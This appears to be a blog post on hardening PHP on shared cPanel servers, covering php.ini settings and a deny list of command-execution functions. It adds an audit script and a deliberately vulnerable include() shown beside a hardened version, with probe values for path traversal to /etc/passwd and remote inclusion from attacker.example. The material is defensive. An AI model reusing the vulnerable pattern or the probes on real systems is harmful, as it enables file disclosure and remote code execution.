Friday, May 17, 2013

PHP Security

PHP is the most popular scripting language used alongside Apache and MySQL, and on a shared cPanel server it is also the most common way in for an attacker. Most of the hardening below is done in the PHP configuration file (php.ini): disabling the functions that reach the operating system and turning off features that make an insecure script easier to exploit.

Suhosin

Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers against a number of well-known problems in PHP applications on the one hand, and against potential unknown vulnerabilities within those applications or the PHP core itself on the other. Note that Suhosin was written for the PHP 5 series and there is no stable release for PHP 7 or later, so on a newer build the remaining settings in this post have to carry the weight on their own.

On cPanel you can enable Suhosin through EasyApache at /scripts/easyapache:

1. Log in as root.
2. Run /scripts/easyapache.
3. In the PHP options, select Suhosin.
4. Save and build.
5. Verify with php -m, which lists the loaded modules; suhosin should be among them. Check the web server's PHP, not only the CLI binary, since the two may be built or configured differently.

Disable Dangerous PHP Functions

PHP has a lot of potential to mess up your server, compromise user accounts and even lead to root. I've seen many times how users use an insecure PHP script as an entry point to a server, start unleashing dangerous commands and take control. Once an attacker can run PHP, functions such as system(), exec() and shell_exec() let them execute operating-system commands as the web server user, and from there they go after other accounts and local privilege escalation. Disabling those functions globally takes that first step away from every script on the box.

Steps:

1. Find the php.ini that is actually loaded:
php -i | grep php.ini
Run this for the web server SAPI as well as the CLI: the two can read different files, and it is the web server's copy that matters here.

2. Edit it (on a cPanel build it is normally this file):
vi /usr/local/lib/php.ini

3. Look for the disable_functions line and make sure it reads as below. exec is easy to overlook but runs commands just like system and shell_exec, so it belongs in the list:
disable_functions = dl, exec, shell_exec, system, passthru, popen, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid

disable_functions is a system-level directive: it can only be set in php.ini (or the server configuration), and a script cannot undo it with ini_set() or a php_value line in .htaccess. Restart Apache after the change, because php.ini is read when the server starts.

Turn off Register Globals

With register_globals on, PHP injects request data (GET, POST and cookie values) into your scripts as ordinary global variables. Combined with the fact that PHP does not require variables to be initialised, this means an attacker can preset any variable a script forgets to initialise simply by naming it in the query string, so writing insecure code becomes that much easier. The directive is deprecated in PHP 5.3 and was removed in 5.4; on older builds make sure it is off:

register_globals = Off

magic_quotes_gpc = Off

A common piece of older advice is to keep magic_quotes_gpc on so that forms using POST cannot be used for SQL injection attacks. It does not deliver that: it blindly backslash-escapes every incoming value, knows nothing about the database's character set, does nothing for values used in a numeric context, and corrupts data that never goes near a database. The directive is deprecated in PHP 5.3 and was removed in 5.4. Leave it off and let the code do the work: prepared statements with bound parameters (mysqli or PDO), and a charset-aware escaping function only where a query genuinely cannot be parameterised.
Run PHP through PHPsuexec/suPHP to Prevent "nobody" Access

The biggest problem with PHP on cPanel servers is that, loaded as an Apache module, PHP runs as the Apache user, nobody, for every site on the box. Whatever nobody can read or write, every site's PHP can read or write. When someone sets a script to 777, the nobody user has write access to that file, so if another customer on the same shared server writes a script that searches the system for 777 files they can inject anything they want into it and compromise the unsuspecting user's account. Reading is just as bad: a site's configuration file holding its database credentials has to be readable by nobody for the site to work at all, which means any other site on the server can read it too.

PHPsuexec (and suPHP) makes PHP run as the account owner instead, and refuses to execute world-writable (777) scripts, so that cross-account write is closed. There are a few downsides to PHPsuexec, but I think it is required in a shared environment for everyone's security. Safe mode does not prevent one user from compromising another user's files (it was deprecated in PHP 5.3 and removed in 5.4 precisely because it was never a real boundary); this is where PHPsuexec comes in, since with PHP running as the user the ordinary file permissions stop a user from reading another user's files. It also makes life easier for you as the administrator: mail() spamming and other problems caused by PHP scripts now run under the account responsible, so you can easily track them back to it. Two caveats: PHP runs as CGI under suPHP, so php_value and php_flag lines in .htaccess stop working and have to move into a per-user php.ini, and if users are allowed their own php.ini, disable_functions and the other settings in this post must be enforced in that copy too, or the override denied.

The following settings are all useful ways of capping the resources a PHP script can consume. They will not stop an attack on their own, but they limit what a runaway or malicious script can take from the rest of the server; treat the numbers below as a starting point and raise them only to what your applications actually need.

; Maximum execution time of each script, in seconds (0 means unlimited; leave that to the CLI only)
max_execution_time = 30

; Maximum amount of time each script may spend parsing request data
max_input_time = 60

; Maximum amount of memory a script may consume (8MB here; -1 means unlimited, avoid it)
memory_limit = 8M

; Maximum size of POST data that PHP will accept. Must be at least upload_max_filesize, or uploads of that size are silently rejected.
post_max_size = 8M

; Whether to allow HTTP file uploads. Set Off only if no site on the server needs uploads; otherwise leave it On and rely on the size limit below.
file_uploads = Off

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M
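The settings in the sections above are easy to put into php.ini and then lose again to a later EasyApache build, a second php.ini, or a per-user override, so it is worth checking them on the running server rather than trusting the file. The following audit script is an added example and not code from the original post. The functions it expects to be disabled are the list recommended above plus exec(); the flag values and limits it checks are the ones recommended in this post and are an assumed policy you can edit; it assumes PHP 7.1 or later. It uses function_exists() deliberately, because PHP reports a disabled function as not existing, which is exactly what an attacker's script would see.

```php
<?php
// php_hardening_audit.php: added example, not part of the original post.
// Verifies the php.ini settings recommended above and that the listed functions
// are really disabled. Run it under the SAPI that serves your sites.
declare(strict_types=1);

// The post's disable_functions list, plus exec(), which it omits.
const DANGEROUS_FUNCTIONS = [
    'dl', 'exec', 'shell_exec', 'system', 'passthru', 'popen', 'pclose',
    'proc_open', 'proc_nice', 'proc_terminate', 'proc_get_status', 'proc_close',
    'pfsockopen', 'leak', 'apache_child_terminate', 'posix_kill', 'posix_mkfifo',
    'posix_setpgid', 'posix_setsid', 'posix_setuid',
];

// Boolean directives and the value this post expects (assumed policy).
const EXPECTED_FLAGS = [
    'register_globals'  => false,
    'magic_quotes_gpc'  => false,
    'allow_url_fopen'   => false,
    'allow_url_include' => false,
    'file_uploads'      => false,
];

// ini_get() yields "1"/"" for flags parsed from php.ini, or the raw text when
// set elsewhere; false means the directive does not exist in this PHP build.
function ini_flag(string $name): ?bool
{
    $raw = ini_get($name);
    if ($raw === false) {
        return null;
    }
    return !in_array(strtolower((string) $raw), ['', '0', 'off', 'false', 'no', 'none'], true);
}

// php.ini shorthand ("8M", "2G", "512K") to bytes; -1 or empty means unlimited.
function ini_bytes(string $name): int
{
    $v = trim((string) ini_get($name));
    if ($v === '' || $v === '-1') {
        return -1;
    }
    $mult = ['k' => 1024, 'm' => 1024 ** 2, 'g' => 1024 ** 3];
    $unit = strtolower(substr($v, -1));
    return isset($mult[$unit]) ? (int) substr($v, 0, -1) * $mult[$unit] : (int) $v;
}

// Names listed in disable_functions, lower-cased, as a set.
function disabled_set(): array
{
    $set = [];
    foreach (explode(',', (string) ini_get('disable_functions')) as $f) {
        $f = strtolower(trim($f));
        if ($f !== '') {
            $set[$f] = true;
        }
    }
    return $set;
}

// Returns a list of findings; an empty list means the host matches the policy.
function audit(): array
{
    $findings = [];
    $disabled = disabled_set();
    foreach (DANGEROUS_FUNCTIONS as $fn) {
        // function_exists() is false for disabled functions and for ones not
        // compiled in (posix_* without ext/posix), so only live ones are reported.
        if (!isset($disabled[$fn]) && function_exists($fn)) {
            $findings[] = "$fn() is callable: add it to disable_functions";
        }
    }
    foreach (EXPECTED_FLAGS as $name => $want) {
        $have = ini_flag($name);
        if ($have === null) {
            continue;   // directive removed in this PHP version (register_globals, magic_quotes_gpc since 5.4)
        }
        if ($have !== $want) {
            $findings[] = sprintf('%s = %s, expected %s', $name, $have ? 'On' : 'Off', $want ? 'On' : 'Off');
        }
    }
    if (PHP_SAPI !== 'cli' && (int) ini_get('max_execution_time') === 0) {
        $findings[] = 'max_execution_time = 0 (unlimited)';
    }
    if (ini_bytes('memory_limit') === -1) {
        $findings[] = 'memory_limit = -1 (unlimited)';
    }
    $post = ini_bytes('post_max_size');
    if ($post > 0 && ini_bytes('upload_max_filesize') > $post) {
        $findings[] = 'upload_max_filesize exceeds post_max_size (the smaller value wins)';
    }
    if (!extension_loaded('suhosin')) {
        $findings[] = 'Suhosin extension not loaded (PHP 5 only; no stable release for PHP 7+)';
    }
    return $findings;
}

$findings = audit();
printf("PHP %s (%s), php.ini: %s\n", PHP_VERSION, PHP_SAPI, php_ini_loaded_file() ?: 'none');
foreach ($findings as $f) {
    echo " - $f\n";
}
exit($findings === [] ? 0 : 1);
```

Run it as the web SAPI, not only from the shell: use php-cgi, or drop it into a docroot, request it once and delete it, because the CLI may load a different php.ini and has its own unlimited max_execution_time. The exit status is non-zero when anything deviates from the policy, so the script can run from cron or as a post-build check after EasyApache.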

Avoid Opening Remote Files

One of PHP's conveniences is that its file functions accept URLs as well as paths: fopen(), file_get_contents() and friends can fetch an http:// or ftp:// resource with no extra processing.

Many simple scripts use this ability; a comic viewer, for example, might load images from a remote server with nothing more than fopen(), the function ordinarily used to open local files.

It is an ability that has often been abused in insecure scripts, though.

If you have a script that opens a file and the filename is controllable by a remote user, two things can happen:
1. Any file on the local system that the web server can read can be viewed by the remote attacker (path traversal / local file inclusion).
2. Arbitrary code can be executed on your server if the user can cause a remote PHP file to be opened with include or require (remote file inclusion): PHP fetches the file and runs it.

Two directives limit the damage. allow_url_fopen governs whether fopen() and the other file functions accept URLs at all; allow_url_include, a separate switch since PHP 5.2 that is off by default, governs whether include, require and their _once variants do. Set allow_url_fopen = Off and allow_url_include = Off in php.ini unless a site genuinely needs remote fetching, and even then keep allow_url_include off. Neither setting helps with the first case: a user-supplied path that stays on the local disk has to be validated in the script itself.
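The two outcomes above, and the check that prevents them, side by side. This is an added example and not code from the original post: the request parameter name "page", the templates directory layout (one <name>.php per page) and the attacker hostname are all assumed, and it needs PHP 7.1 or later. The vulnerable function is there to be read, not run; the hardened one maps a request value onto exactly one file under one directory or refuses it.

```php
<?php
// Added example, not code from the original post. "page" (the request
// parameter), the templates directory and attacker.example are assumed names.
declare(strict_types=1);

// VULNERABLE: the filename comes straight from the request.
//   ?page=../../../../etc/passwd         -> any file the web user can read is
//                                           echoed back (include prints non-PHP text)
//   ?page=http://attacker.example/x.txt  -> with allow_url_include=On, PHP fetches
//                                           the remote file and executes it as code
function show_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: map the request value to a file under one directory, or refuse.
function resolve_template(string $page, string $baseDir): ?string
{
    // 1. Only a simple name is accepted: no slashes, dots, colons or NUL bytes,
    //    so traversal sequences and URL schemes never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    // 2. Resolve symlinks and "..", then insist the result is still under
    //    $baseDir. This catches a symlink inside the directory that points elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Safe entry point: include only what resolve_template() vouched for.
function show_page(string $page, string $baseDir): bool
{
    $path = resolve_template($page, $baseDir);
    if ($path === null) {
        return false;
    }
    include $path;
    return true;
}

// Demo (CLI only): builds a throwaway template directory with one real
// template and tries the kind of values an attacker would send. The included
// template prints its own line before the verdict for "home".
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . bin2hex(random_bytes(4));
    mkdir($dir, 0700);
    file_put_contents($dir . '/home.php', '<?php echo "home template", PHP_EOL;' . PHP_EOL);

    printf("allow_url_fopen=%s allow_url_include=%s\n",
        ini_get('allow_url_fopen') ? 'On' : 'Off',
        ini_get('allow_url_include') ? 'On' : 'Off');

    $probes = ['home', '../../../../etc/passwd', 'http://attacker.example/x.txt', "home\0.txt", 'home.php'];
    foreach ($probes as $p) {
        $served = show_page($p, $dir);
        printf("%-32s => %s\n", addcslashes($p, "\0"), $served ? 'served' : 'rejected');
    }

    unlink($dir . '/home.php');
    rmdir($dir);
}
```

The first check alone already rejects every probe except "home"; the realpath() comparison is defence in depth against a symlink or a later change to the naming rule. Pair it with allow_url_fopen and allow_url_include off so that even a script that skips the check cannot be pointed at a remote URL.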
